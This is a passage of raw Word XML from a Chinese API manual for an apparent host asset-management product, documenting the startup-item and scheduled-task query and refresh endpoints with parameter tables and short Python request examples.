        <w:br/>
        <w:t xml:space="preserve">    return res</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>service_win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "http://%s:%s/external/api/assets/service/win?showName=Google%%20Chrome&amp;enable=true&amp;startType=1,2&amp;publisher=Google&amp;user=""" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>showName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>': 'Google Chrome', 'enable': 'true', '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>startType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>': '1,2', 'publisher': 'Google', 'user': ''}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">("GET", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print "result: ",res</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>if __name__ == '__main__':</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>service_win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6824926E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>启动项</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1270E2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>service_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "http://%s:%s/external/api/assets/service/linux?initLevel=2&amp;name=bootmisc.sh&amp;defaultOpen=true,false&amp;isXinetd=false,true" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    data = {'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>initLevel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>': 2, 'name': 'bootmisc.sh', '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>defaultOpen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>': '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>true,false</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>', '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>isXinetd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>': '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>false,true</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>'}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">("GET", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print "result: ",res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04816FAA" w14:textId="3F692F7E" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>对于签名的部分，有疑问可以参考</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:instrText>HYPERLINK \l "身份认证" \h</w:instrText>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:t>身份认证</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:hyperlink w:anchor="请求签名">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>请求签名</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A56CE6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="109" w:name="_Toc115166129"/>
      <w:bookmarkStart w:id="110" w:name="启动项信息扫描"/>
      <w:bookmarkEnd w:id="108"/>
      <w:r>
        <w:t>启动项信息扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="109"/>
    </w:p>
    <w:p w14:paraId="094FB0D7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于请求启动项信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513FD031" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1822C876" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/service/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>win|linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0971167C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52784EB0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6FA641" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1249F02C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/service/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398F7278" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F273F0F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAAF7A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEB3C93"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777F9FC0"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4CE4DE8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6208C79" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59B9E462" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B7B6921" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="587CF58C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2F676ED9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="033A3671" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B474C83" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="294F3807" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F252774" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E144F47" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>启动项信息扫描更新数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C322577" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>refresh(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "http://%s:%s/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/service/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/refresh" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">("POST", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD43BCC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
      <w:r>
        <w:t>win启动项信息扫描更新数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B06B45D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>refresh(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "http://%s:%s/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/service/win/refresh" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">("POST", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B42108E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="111" w:name="_Toc115166130"/>
      <w:bookmarkStart w:id="112" w:name="启动项信息查询扫描状态"/>
      <w:bookmarkEnd w:id="110"/>
      <w:r>
        <w:t>启动项信息查询扫描状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="111"/>
    </w:p>
    <w:p w14:paraId="5081D6F9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>用于查询启动项信息的扫描状态；具体请求方式参照3.1。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202101EC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="113" w:name="_Toc115166131"/>
      <w:bookmarkStart w:id="114" w:name="计划任务信息"/>
      <w:bookmarkEnd w:id="106"/>
      <w:bookmarkEnd w:id="112"/>
      <w:r>
        <w:t>计划任务信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="113"/>
    </w:p>
    <w:p w14:paraId="2D53910E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F08326" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该功能API用于查询资产中的计划任务信息，获取查询的结果并展示；每条数据均包含主机信息，您可以灵活的使用该API组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE44A6F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43084117" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>计划任务信息查询有两种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB5F51C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>直接获取当前信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15890047" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>更新数据后，再获取最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DC53BF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>为了满足上述功能，我们提供了三个接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7685A9D0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>计划任务信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D09231" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>计划任务信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C851E91" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>计划任务信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F2866D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>使用方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681C0286" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接查询当前信息则直接调用计划任务信息查询结果接口（即1号接口）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1599C37F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>获取更新数据则先调用2号接口进行更新再调用3号接口查看是否更新完成，最后再调用1号接口查询最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46ED996E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>接口的调用方法、参数和返回信息等具体如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2423F6F1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="115" w:name="_Toc115166132"/>
      <w:bookmarkStart w:id="116" w:name="计划任务信息查询结果"/>
      <w:r>
        <w:t>计划任务信息查询结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="115"/>
    </w:p>
    <w:p w14:paraId="12C53732" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于查询计划任务信息，按每台主机每个计划任务进行展示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E3431F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5392BA74" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/task/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F07C4D7"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173"/>
        <w:gridCol w:w="1339"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="4051"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="2DB817C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81737A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DBE1F4A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21C320C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55CCD299" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2AEB9D0A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A7582EB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="592C1F60" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CBC93F3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39847E3C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="65D881A7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BF448EC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
